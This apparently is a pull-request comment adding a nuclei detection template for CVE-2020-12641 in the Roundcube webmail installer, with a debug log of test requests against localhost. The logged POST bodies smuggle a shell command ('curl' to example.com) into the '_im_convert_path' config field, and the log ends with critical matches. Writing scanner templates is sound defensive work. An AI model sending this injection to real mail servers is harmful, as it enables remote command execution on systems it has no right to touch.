Added a template for CVE-2020-12641; it will match if the config was successfully updated by the HTTP POST.
/claim #12153
I’ve validated this template locally?
[INF] [CVE-2020-12641] Dumped HTTP request for http://localhost/installer/index.php
POST /installer/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2323.2827.4973/49
Connection: close
Content-Length: 983
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
_step=2&_product_name=Roundcube+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Ftemp%2F&_des_key=aaCGmrf1vc2NIJ8whIA3aG9x&_enable_spellcheck=1&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=localhost&_dbname=roundcube&_dbuser=roundcube&_dbpass=roundcube&_db_prefix=&_default_host%5B%5D=localhost&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=localhost&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_smtp_log=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_prefer_html=1&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_autologon=autologon&_plugins_enigma=enigma&_plugins_zipdownload=zipdownload&submit=UPDATE+CONFIG&G&_im_convert_path=curl+http%3a//example.com
[DBG] [CVE-2020-12641] Dumped HTTP response http://localhost/installer/index.php
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 01 Jun 2025 15:25:07 GMT
Server: Apache/2.4.52 (Debian)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.52 (Debian) Server at localhost Port 80</address>
</body></html>
[INF] [CVE-2020-12641] Dumped HTTP request for http://localhost/roundcube/installer/index.php
POST /roundcube/installer/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Connection: close
Content-Length: 983
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
_step=2&_product_name=Roundcube+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Ftemp%2F&_des_key=aaCGmrf1vc2NIJ8whIA3aG9x&_enable_spellcheck=1&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=localhost&_dbname=roundcube&_dbuser=roundcube&_dbpass=roundcube&_db_prefix=&_default_host%5B%5D=localhost&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=localhost&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_smtp_log=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_prefer_html=1&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_autologon=autologon&_plugins_enigma=enigma&_plugins_zipdownload=zipdownload&submit=UPDATE+CONFIG&G&_im_convert_path=curl+http%3a//example.com
[DBG] [CVE-2020-12641] Dumped HTTP response http://localhost/roundcube/installer/index.php
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 01 Jun 2025 15:25:07 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.52 (Debian)
Set-Cookie: PHPSESSID=65edfd177450d17bdacfeac4a688f9e2; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Roundcube Webmail Installer</title>
<meta name="Robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="styles.css" />
<script type="text/javascript" src="client.js"></script>
</head>
<body>
<div id="banner">
<div class="banner-bg"></div>
<div class="banner-logo"><a href="http://roundcube.net"><img src="images/roundcube_logo.png" width="210" height="55" border="0" alt="Roundcube - open source webmail software" /></a></div>
</div>
<div id="topnav">
<a href="https://github.com/roundcube/roundcubemail/wiki/Installation">How-to Wiki</a>
</div>
<div id="content">
<h1>Roundcube Webmail Installer</h1>
<ol id="progress">
<li class="step2 passed"><a href="./index.php?_step=1">Check environment</a></li><li class="step3 current"><a href="./index.php?_step=2">Create config</a></li><li class="step4"><a href="./index.php?_step=3">Test config</a></li></ol>
<p class="notice">The config file was saved successfully into <tt>/var/www/html/roundcube/config</tt> directory of your Roundcube installation.</p><p class="hint">Of course there are more options to configure.
Have a look at the defaults.inc.php file or visit <a href="https://github.com/roundcube/roundcubemail/wiki/Configuration" target="_blank">Howto_Config</a> to find out.</p><p><input type="button" onclick="location.href='./index.php?_step=3'" value="CONTINUE" /></p>
<hr style='margin-bottom:1.6em' />
<form action="index.php" method="post">
<input type="hidden" name="_step" value="2" />
<fieldset>
<legend>General configuration</legend>
<dl class="configblock">
<dt class="propname">product_name</dt>
<dd>
<input name="_product_name" size="30" id="cfgprodname" value="Roundcube Webmail" type="text"><div>The name of your service (used to compose page titles)</div>
</dd>
<dt class="propname">support_url</dt>
<dd>
<input name="_support_url" size="50" id="cfgsupporturl" value="" type="text"><div>Provide an URL where a user can get support for this Roundcube installation.<br/>PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!</div>
<p class="hint">Enter an absolute URL (including http://) to a support page/form or a mailto: link.</p>
</dd>
<dt class="propname">skin_logo</dt>
<dd>
<input name="_skin_logo" size="50" id="cfgskinlogo" value="" type="text"><div>Custom image to display instead of the Roundcube logo.</div>
<p class="hint">Enter a URL relative to the document root of this Roundcube installation.</p>
</dd>
<dt class="propname">temp_dir</dt>
<dd>
<input name="_temp_dir" size="30" id="cfgtempdir" value="/var/www/html/roundcube/temp/" type="text"><div>Use this folder to store temp files (must be writeable for webserver)</div>
</dd>
<dt class="propname">des_key</dt>
<dd>
<input name="_des_key" size="30" id="cfgdeskey" value="aaCGmrf1vc2NIJ8whIA3aG9x" type="text"><div>This key is used to encrypt the users imap password before storing in the session record</div>
<p class="hint">It's a random generated string to ensure that every installation has its own key.</p>
</dd>
<dt class="propname">ip_check</dt>
<dd>
<input name="_ip_check" id="cfgipcheck" value="1" type="checkbox"><label for="cfgipcheck">Check client IP in session authorization</label><br />
<p class="hint">This increases security but can cause sudden logouts when someone uses a proxy with changing IPs.</p>
</dd>
<dt class="propname">enable_spellcheck</dt>
<dd>
<input name="_enable_spellcheck" id="cfgspellcheck" value="1" checked="checked" type="checkbox"><label for="cfgspellcheck">Make use of the spell checker</label><br />
</dd>
<dt class="propname">spellcheck_engine</dt>
<dd>
<select name="_spellcheck_engine" id="cfgspellcheckengine">
<option value="googie" selected="selected">Googie</option>
<option value="atd">ATD</option>
</select>
<label for="cfgspellcheckengine">Which spell checker to use</label><br />
<p class="hint">Googie implies that the message content will be sent to external server to check the spelling.</p>
</dd>
<dt class="propname">identities_level</dt>
<dd>
<select name="_identities_level" id="cfgidentitieslevel">
<option value="0" selected="selected">many identities with possibility to edit all params</option>
<option value="1">many identities with possibility to edit all params but not email address</option>
<option value="2">one identity with possibility to edit all params</option>
<option value="3">one identity with possibility to edit all params but not email address</option>
<option value="4">one identity with possibility to edit only signature</option>
</select>
<div>Level of identities access</div>
<p class="hint">Defines what users can do with their identities.</p>
</dd>
</dl>
</fieldset>
<fieldset>
<legend>Logging & Debugging</legend>
<dl class="loggingblock">
<dt class="propname">log_driver</dt>
<dd>
<select name="_log_driver" id="cfglogdriver">
<option value="file" selected="selected">file</option>
<option value="syslog">syslog</option>
<option value="stdout">stdout</option>
</select>
<div>How to do logging? 'file' - write to files in the log directory, 'syslog' - use the syslog facility, 'stdout' writes to the process' STDOUT file descriptor.</div>
</dd>
<dt class="propname">log_dir</dt>
<dd>
<input name="_log_dir" size="30" id="cfglogdir" value="/var/www/html/roundcube/logs/" type="text"><div>Use this folder to store log files (must be writeable for webserver). Note that this only applies if you are using the 'file' log_driver.</div>
</dd>
<dt class="propname">syslog_id</dt>
<dd>
<input name="_syslog_id" size="30" id="cfgsyslogid" value="roundcube" type="text"><div>What ID to use when logging with syslog. Note that this only applies if you are using the 'syslog' log_driver.</div>
</dd>
<dt class="propname">syslog_facility</dt>
<dd>
<select name="_syslog_facility" id="cfgsyslogfacility">
<option value="8" selected="selected">user-level messages</option>
<option value="16">mail subsystem</option>
<option value="128">local level 0</option>
<option value="136">local level 1</option>
<option value="144">local level 2</option>
<option value="152">local level 3</option>
<option value="160">local level 4</option>
<option value="168">local level 5</option>
<option value="176">local level 6</option>
<option value="184">local level 7</option>
</select>
<div>What ID to use when logging with syslog. Note that this only applies if you are using the 'syslog' log_driver.</div>
</dd>
</dl>
</fieldset>
<fieldset>
<legend>Database setup</legend>
<dl class="configblock" id="cgfblockdb">
<dt class="propname">db_dsnw</dt>
<dd>
<p>Database settings for read/write operations:</p>
<select name="_dbtype" id="cfgdbtype">
<option value="sqlite">SQLite</option>
</select>
<label for="cfgdbtype">Database type</label><br /><input name="_dbhost" size="20" id="cfgdbhost" value="localhost" type="text"><label for="cfgdbhost">Database server (omit for sqlite)</label><br /><input name="_dbname" size="20" id="cfgdbname" value="roundcube" type="text"><label for="cfgdbname">Database name (use absolute path and filename for sqlite)</label><br /><input name="_dbuser" size="20" id="cfgdbuser" value="roundcube" type="text"><label for="cfgdbuser">Database user name (needs write permissions)(omit for sqlite)</label><br /><input name="_dbpass" size="20" id="cfgdbpass" value="roundcube" type="text"><label for="cfgdbpass">Database password (omit for sqlite)</label><br /></dd>
<dt class="propname">db_prefix</dt>
<dd>
<input name="_db_prefix" size="20" id="cfgdbprefix" value="" type="text"><div>Optional prefix that will be added to database object names (tables and sequences).</div>
</dd>
</dl>
</fieldset>
<fieldset>
<legend>IMAP Settings</legend>
<dl class="configblock" id="cgfblockimap">
<dt class="propname">default_host</dt>
<dd>
<div>The IMAP host(s) chosen to perform the log-in</div>
<div id="defaulthostlist">
<div id="defaulthostentry0"><input name="_default_host[]" size="30" value="localhost" type="text"></div></div>
<div><a href="javascript:addhostfield()" class="addlink" title="Add another field">add</a></div>
<p class="hint">Leave blank to show a textbox at login. To use SSL/IMAPS connection, type ssl://hostname</p>
</dd>
<dt class="propname">default_port</dt>
<dd>
<input name="_default_port" size="6" id="cfgimapport" value="143" type="text"><div>TCP port used for IMAP connections</div>
</dd>
<dt class="propname">username_domain</dt>
<dd>
<input name="_username_domain" size="30" id="cfguserdomain" value="" type="text"><div>Automatically add this domain to user names for login</div>
<p class="hint">Only for IMAP servers that require full e-mail addresses for login</p>
</dd>
<dt class="propname">auto_create_user</dt>
<dd>
<input name="_auto_create_user" id="cfgautocreate" value="1" checked="checked" type="checkbox"><label for="cfgautocreate">Automatically create a new Roundcube user when log-in the first time</label><br />
<p class="hint">A user is authenticated by the IMAP server but it requires a local record to store settings
and contacts. With this option enabled a new user record will automatically be created once the IMAP login succeeds.</p>
<p class="hint">If this option is disabled, the login only succeeds if there's a matching user-record in the local Roundcube database
what means that you have to create those records manually or disable this option after the first login.</p>
</dd>
<dt class="propname">sent_mbox</dt>
<dd>
<input name="_sent_mbox" size="20" id="cfgsentmbox" value="Sent" type="text"><div>Store sent messages in this folder</div>
<p class="hint">Leave blank if sent messages should not be stored. Note: folder must include namespace prefix if any.</p>
</dd>
<dt class="propname">trash_mbox</dt>
<dd>
<input name="_trash_mbox" size="20" id="cfgtrashmbox" value="Trash" type="text"><div>Move messages to this folder when deleting them</div>
<p class="hint">Leave blank if they should be deleted directly. Note: folder must include namespace prefix if any.</p>
</dd>
<dt class="propname">drafts_mbox</dt>
<dd>
<input name="_drafts_mbox" size="20" id="cfgdraftsmbox" value="Drafts" type="text"><div>Store draft messages in this folder</div>
<p class="hint">Leave blank if they should not be stored. Note: folder must include namespace prefix if any.</p>
</dd>
<dt class="propname">junk_mbox</dt>
<dd>
<input name="_junk_mbox" size="20" id="cfgjunkmbox" value="Junk" type="text"><div>Store spam messages in this folder</div>
<p class="hint">Note: folder must include namespace prefix if any.</p>
</dd>
</dd>
</dl>
</fieldset>
<fieldset>
<legend>SMTP Settings</legend>
<dl class="configblock" id="cgfblocksmtp">
<dt class="propname">smtp_server</dt>
<dd>
<input name="_smtp_server" size="30" id="cfgsmtphost" value="localhost" type="text"><div>Use this host for sending mails</div>
<p class="hint">To use SSL connection, set ssl://smtp.host.com.</p>
</dd>
<dt class="propname">smtp_port</dt>
<dd>
<input name="_smtp_port" size="6" id="cfgsmtpport" value="25" type="text"><div>SMTP port (default is 587)</div>
</dd>
<dt class="propname">smtp_user/smtp_pass</dt>
<dd>
<input name="_smtp_user" size="20" id="cfgsmtpuser" value="" type="text"><input name="_smtp_pass" size="20" id="cfgsmtppass" value="" type="text"><div>SMTP username and password (if required)</div>
<p>
<input name="_smtp_user_u" id="cfgsmtpuseru" value="1" checked="checked" type="checkbox"><label for="cfgsmtpuseru">Use the current IMAP username and password for SMTP authentication</label>
</p>
</dd>
<!--
<dt class="propname">smtp_auth_type</dt>
<dd>
<div>Method to authenticate at the SMTP server. Choose (auto) if you don't know what this is</div>
</dd>
-->
<dt class="propname">smtp_log</dt>
<dd>
<input name="_smtp_log" id="cfgsmtplog" value="1" checked="checked" type="checkbox"><label for="cfgsmtplog">Log sent messages in <tt>{log_dir}/sendmail</tt> or to syslog.</label><br />
</dd>
</dl>
</fieldset>
<fieldset>
<legend>Display settings & user prefs</legend>
<dl class="configblock" id="cgfblockdisplay">
<dt class="propname">language <span class="userconf">*</span></dt>
<dd>
<input name="_language" size="6" id="cfglocale" value="" type="text"><div>The default locale setting. This also defines the language of the login screen.<br/>Leave it empty to auto-detect the user agent language.</div>
<p class="hint">Enter a <a href="http://www.faqs.org/rfcs/rfc1766">RFC1766</a> formatted language name. Examples: en_US, de_DE, de_CH, fr_FR, pt_BR</p>
</dd>
<dt class="propname">skin <span class="userconf">*</span></dt>
<dd>
<select name="_skin" id="cfgskin">
<option>classic</option>
<option>elastic</option>
<option selected="selected">larry</option>
</select>
<div>Name of interface skin (folder in /skins)</div>
</dd>
<dt class="propname">mail_pagesize <span class="userconf">*</span></dt>
<dd>
<input name="_mail_pagesize" size="6" id="cfgmailpagesize" value="50" type="text"><div>Show up to X items in the mail messages list view.</div>
</dd>
<dt class="propname">addressbook_pagesize <span class="userconf">*</span></dt>
<dd>
<input name="_addressbook_pagesize" size="6" id="cfgabookpagesize" value="50" type="text"><div>Show up to X items in the contacts list view.</div>
</dd>
<dt class="propname">prefer_html <span class="userconf">*</span></dt>
<dd>
<input name="_prefer_html" id="cfghtmlview" value="1" checked="checked" type="checkbox"><label for="cfghtmlview">Prefer displaying HTML messages</label><br />
</dd>
<dt class="propname">htmleditor <span class="userconf">*</span></dt>
<dd>
<label for="cfghtmlcompose">Compose HTML formatted messages</label>
<select name="_htmleditor" id="cfghtmlcompose">
<option value="0" selected="selected">never</option>
<option value="1">always</option>
<option value="2">on reply to HTML message only</option>
</select>
</dd>
<dt class="propname">draft_autosave <span class="userconf">*</span></dt>
<dd>
<label for="cfgautosave">Save compose message every</label>
<select name="_draft_autosave" id="cfgautosave">
<option value="0">never</option>
<option value="60">1 min</option>
<option value="180">3 min</option>
<option value="300" selected="selected">5 min</option>
<option value="600">10 min</option>
</select>
</dd>
<dt class="propname">mdn_requests <span class="userconf">*</span></dt>
<dd>
<select name="_mdn_requests" id="cfgmdnreq">
<option value="0" selected="selected">ask the user</option>
<option value="1">send automatically</option>
<option value="3">send receipt to user contacts, otherwise ask the user</option>
<option value="4">send receipt to user contacts, otherwise ignore</option>
<option value="2">ignore</option>
</select>
<div>Behavior if a received message requests a message delivery notification (read receipt)</div>
</dd>
<dt class="propname">mime_param_folding <span class="userconf">*</span></dt>
<dd>
<select name="_mime_param_folding" id="cfgmimeparamfolding">
<option value="0">Full RFC 2231 (Roundcube, Thunderbird)</option>
<option value="1" selected="selected">RFC 2047/2231 (MS Outlook, OE)</option>
<option value="2">Full RFC 2047 (deprecated)</option>
</select>
<div>How to encode attachment long/non-ascii names</div>
</dd>
</dl>
<p class="hint"><span class="userconf">*</span> These settings are defaults for the user preferences</p>
</fieldset>
<fieldset>
<legend>Plugins</legend>
<dl class="configblock" id="cgfblockdisplay">
<dt class="propname"><label><input name="_plugins_acl" id="cfgplugin_acl" value="acl" type="checkbox"> acl</label></dt><dd><label for="cfgplugin_acl" class="hint">IMAP Folders Access Control Lists Management (RFC4314, RFC2086).</label><br/></dd><dt class="propname"><label><input name="_plugins_additional_message_headers" id="cfgplugin_additional_message_headers" value="additional_message_headers" type="checkbox"> additional_message_headers</label></dt><dd><label for="cfgplugin_additional_message_headers" class="hint">Very simple plugin which will add additional headers to or remove them from outgoing messages.</label><br/></dd><dt class="propname"><label><input name="_plugins_archive" id="cfgplugin_archive" value="archive" type="checkbox"> archive</label></dt><dd><label for="cfgplugin_archive" class="hint">This adds a button to move the selected messages to an archive folder. The folder (and the optional structure of subfolders) can be selected in the settings panel.</label><br/></dd><dt class="propname"><label><input name="_plugins_attachment_reminder" id="cfgplugin_attachment_reminder" value="attachment_reminder" type="checkbox"> attachment_reminder</label></dt><dd><label for="cfgplugin_attachment_reminder" class="hint">This Roundcube plugin reminds the user to attach a file if the composed message text indicates that there should be any.</label><br/></dd><dt class="propname"><label><input name="_plugins_autologon" id="cfgplugin_autologon" value="autologon" checked="checked" type="checkbox"> autologon</label></dt><dd><label for="cfgplugin_autologon" class="hint">Sample plugin to try out some hooks</label><br/></dd><dt class="propname"><label><input name="_plugins_database_attachments" id="cfgplugin_database_attachments" value="database_attachments" type="checkbox"> database_attachments</label></dt><dd><label for="cfgplugin_database_attachments" class="hint">This plugin which provides database backed storage for temporary attachment file handling. 
The primary advantage of this plugin is its compatibility with round-robin dns multi-server Roundcube installations.</label><br/></dd><dt class="propname"><label><input name="_plugins_debug_logger" id="cfgplugin_debug_logger" value="debug_logger" type="checkbox"> debug_logger</label></dt><dd><label for="cfgplugin_debug_logger" class="hint">Enhanced logging for debugging purposes. It is not recommened to be enabled on production systems without testing because of the somewhat increased memory, cpu and disk i/o overhead.</label><br/></dd><dt class="propname"><label><input name="_plugins_emoticons" id="cfgplugin_emoticons" value="emoticons" type="checkbox"> emoticons</label></dt><dd><label for="cfgplugin_emoticons" class="hint">Plugin that adds emoticons support.</label><br/></dd><dt class="propname"><label><input name="_plugins_enigma" id="cfgplugin_enigma" value="enigma" checked="checked" type="checkbox"> enigma</label></dt><dd><label for="cfgplugin_enigma" class="hint">Server-side PGP Encryption for Roundcube</label><br/></dd><dt class="propname"><label><input name="_plugins_example_addressbook" id="cfgplugin_example_addressbook" value="example_addressbook" type="checkbox"> example_addressbook</label></dt><dd><label for="cfgplugin_example_addressbook" class="hint">Sample plugin to add a new address book with just a static list of contacts</label><br/></dd><dt class="propname"><label><input name="_plugins_filesystem_attachments" id="cfgplugin_filesystem_attachments" value="filesystem_attachments" type="checkbox"> filesystem_attachments</label></dt><dd><label for="cfgplugin_filesystem_attachments" class="hint">This is a core plugin which provides basic, filesystem based attachment temporary file handling. 
This includes storing attachments of messages currently being composed, writing attachments to disk when drafts with attachments are re-opened and writing attachments to disk for inline display in current html compositions.</label><br/></dd><dt class="propname"><label><input name="_plugins_help" id="cfgplugin_help" value="help" type="checkbox"> help</label></dt><dd><label for="cfgplugin_help" class="hint">Plugin adds a new item (Help) in taskbar.</label><br/></dd><dt class="propname"><label><input name="_plugins_hide_blockquote" id="cfgplugin_hide_blockquote" value="hide_blockquote" type="checkbox"> hide_blockquote</label></dt><dd><label for="cfgplugin_hide_blockquote" class="hint">This allows to hide long blocks of cited text in messages.</label><br/></dd><dt class="propname"><label><input name="_plugins_http_authentication" id="cfgplugin_http_authentication" value="http_authentication" type="checkbox"> http_authentication</label></dt><dd><label for="cfgplugin_http_authentication" class="hint">HTTP Basic Authentication</label><br/></dd><dt class="propname"><label><input name="_plugins_identicon" id="cfgplugin_identicon" value="identicon" type="checkbox"> identicon</label></dt><dd><label for="cfgplugin_identicon" class="hint">Displays Github-like identicons for contacts/addresses without photo specified.</label><br/></dd><dt class="propname"><label><input name="_plugins_identity_select" id="cfgplugin_identity_select" value="identity_select" type="checkbox"> identity_select</label></dt><dd><label for="cfgplugin_identity_select" class="hint">On reply to a message user identity selection is based on
content of standard headers like From, To, Cc and Return-Path.
Here you can add header(s) set by your SMTP server (e.g.
Delivered-To, Envelope-To, X-Envelope-To, X-RCPT-TO) to make
identity selection more accurate.</label><br/></dd><dt class="propname"><label><input name="_plugins_jqueryui" id="cfgplugin_jqueryui" value="jqueryui" type="checkbox"> jqueryui</label></dt><dd><label for="cfgplugin_jqueryui" class="hint">Plugin adds the complete jQuery-UI library including the smoothness theme to Roundcube. This allows other plugins to use jQuery-UI without having to load their own version. The benefit of using one central jQuery-UI is that we wont run into problems of conflicting jQuery libraries being loaded. All plugins that want to use jQuery-UI should use this plugin as a requirement.</label><br/></dd><dt class="propname"><label><input name="_plugins_krb_authentication" id="cfgplugin_krb_authentication" value="krb_authentication" type="checkbox"> krb_authentication</label></dt><dd><label for="cfgplugin_krb_authentication" class="hint">Kerberos Authentication</label><br/></dd><dt class="propname"><label><input name="_plugins_managesieve" id="cfgplugin_managesieve" value="managesieve" type="checkbox"> managesieve</label></dt><dd><label for="cfgplugin_managesieve" class="hint">Adds a possibility to manage Sieve scripts (incoming mail filters). It's clickable interface which operates on text scripts and communicates with server using managesieve protocol. Adds Filters tab in Settings.</label><br/></dd><dt class="propname"><label><input name="_plugins_markasjunk" id="cfgplugin_markasjunk" value="markasjunk" type="checkbox"> markasjunk</label></dt><dd><label for="cfgplugin_markasjunk" class="hint">Adds buttons to mark messages as Junk/Non-Junk with moving to the Junk folder and Spam/Ham learning.</label><br/></dd><dt class="propname"><label><input name="_plugins_new_user_dialog" id="cfgplugin_new_user_dialog" value="new_user_dialog" type="checkbox"> new_user_dialog</label></dt><dd><label for="cfgplugin_new_user_dialog" class="hint">When a new user is created, this plugin checks the default identity and sets a session flag in case it is incomplete. 
An overlay box will appear on the screen until the user has reviewed/completed his identity.</label><br/></dd><dt class="propname"><label><input name="_plugins_new_user_identity" id="cfgplugin_new_user_identity" value="new_user_identity" type="checkbox"> new_user_identity</label></dt><dd><label for="cfgplugin_new_user_identity" class="hint">Populates a new user's default identity from LDAP on their first visit.</label><br/></dd><dt class="propname"><label><input name="_plugins_newmail_notifier" id="cfgplugin_newmail_notifier" value="newmail_notifier" type="checkbox"> newmail_notifier</label></dt><dd><label for="cfgplugin_newmail_notifier" class="hint">Supports three methods of notification: 1. Basic - focus browser window and change favicon 2. Sound - play wav file 3. Desktop - display desktop notification (using HTML5 Notification API feature).</label><br/></dd><dt class="propname"><label><input name="_plugins_password" id="cfgplugin_password" value="password" type="checkbox"> password</label></dt><dd><label for="cfgplugin_password" class="hint">Password Change for Roundcube. Plugin adds a possibility to change user password using many methods (drivers) via Settings/Password tab.</label><br/></dd><dt class="propname"><label><input name="_plugins_redundant_attachments" id="cfgplugin_redundant_attachments" value="redundant_attachments" type="checkbox"> redundant_attachments</label></dt><dd><label for="cfgplugin_redundant_attachments" class="hint">This plugin provides a redundant storage for temporary uploaded attachment files. They are stored in both the database backend as well as on the local file system. 
It provides also memcache store as a fallback.</label><br/></dd><dt class="propname"><label><input name="_plugins_show_additional_headers" id="cfgplugin_show_additional_headers" value="show_additional_headers" type="checkbox"> show_additional_headers</label></dt><dd><label for="cfgplugin_show_additional_headers" class="hint">Proof-of-concept plugin which will fetch additional headers and display them in the message view.</label><br/></dd><dt class="propname"><label><input name="_plugins_squirrelmail_usercopy" id="cfgplugin_squirrelmail_usercopy" value="squirrelmail_usercopy" type="checkbox"> squirrelmail_usercopy</label></dt><dd><label for="cfgplugin_squirrelmail_usercopy" class="hint">Copy a new users identity and settings from a nearby Squirrelmail installation</label><br/></dd><dt class="propname"><label><input name="_plugins_subscriptions_option" id="cfgplugin_subscriptions_option" value="subscriptions_option" type="checkbox"> subscriptions_option</label></dt><dd><label for="cfgplugin_subscriptions_option" class="hint">A plugin which can enable or disable the use of imap subscriptions. It includes a toggle on the settings page under "Server Settings". The preference can also be locked.</label><br/></dd><dt class="propname"><label><input name="_plugins_userinfo" id="cfgplugin_userinfo" value="userinfo" type="checkbox"> userinfo</label></dt><dd><label for="cfgplugin_userinfo" class="hint">Sample plugin that adds a new tab to the settings section to display some information about the current user.</label><br/></dd><dt class="propname"><label><input name="_plugins_vcard_attachments" id="cfgplugin_vcard_attachments" value="vcard_attachments" type="checkbox"> vcard_attachments</label></dt><dd><label for="cfgplugin_vcard_attachments" class="hint">Detects vCard attachments and allows to add them to address book. 
Also allows to attach vCards of your contacts to composed messages</label><br/></dd><dt class="propname"><label><input name="_plugins_virtuser_file" id="cfgplugin_virtuser_file" value="virtuser_file" type="checkbox"> virtuser_file</label></dt><dd><label for="cfgplugin_virtuser_file" class="hint">Plugin adds possibility to resolve user email/login according to lookup tables in files.</label><br/></dd><dt class="propname"><label><input name="_plugins_virtuser_query" id="cfgplugin_virtuser_query" value="virtuser_query" type="checkbox"> virtuser_query</label></dt><dd><label for="cfgplugin_virtuser_query" class="hint">Plugin adds possibility to resolve user email/login according to lookup tables in SQL database.</label><br/></dd><dt class="propname"><label><input name="_plugins_zipdownload" id="cfgplugin_zipdownload" value="zipdownload" checked="checked" type="checkbox"> zipdownload</label></dt><dd><label for="cfgplugin_zipdownload" class="hint">Adds an option to download all attachments to a message in one zip file, when a message has multiple attachments. Also allows the download of a selection of messages in one zip file. Supports mbox and maildir format.</label><br/></dd></dl>
<p class="hint">Please consider checking dependencies of enabled plugins</p>
</fieldset>
<p><input type="submit" name="submit" value="UPDATE CONFIG" /></p></form>
</div>
<div id="footer">
Installer by the Roundcube Dev Team. Copyright © 2008-2012 – Published under the GNU Public License;
Icons by <a href="http://famfamfam.com">famfamfam</a>
</div>
</body>
</html>
[CVE-2020-12641:status-1] [http] [critical] http://localhost/roundcube/installer/index.php
[CVE-2020-12641:word-2] [http] [critical] http://localhost/roundcube/installer/index.php
Dominic Whewell
@domwhewell-sage
ProjectDiscovery
@projectdiscovery